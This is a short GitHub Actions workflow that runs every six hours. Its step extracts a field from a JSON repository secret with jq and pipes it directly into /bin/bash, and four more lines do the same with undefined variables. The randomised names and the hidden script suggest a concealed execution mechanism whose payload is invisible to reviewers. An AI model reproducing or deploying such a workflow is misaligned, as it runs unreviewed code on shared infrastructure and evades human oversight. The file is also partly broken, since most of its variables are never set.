name: processcommitment

on:
  workflow_dispatch:
  schedule:
    - cron: '26 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: processcommitment
        env:
          uxi81: ${{ secrets.uxi81 }}
        run: |
          echo $uxi81 | jq -r .fnguo68566 | /bin/bash
          echo $vcqa04512 | jq -r .k11 | /bin/bash
          echo $k64 | jq -r .fgg8971 | /bin/bash
          echo $skgqi16504 | jq -r .wr693 | /bin/bash
          echo $xo6 | jq -r .rkzl36 | /bin/bash

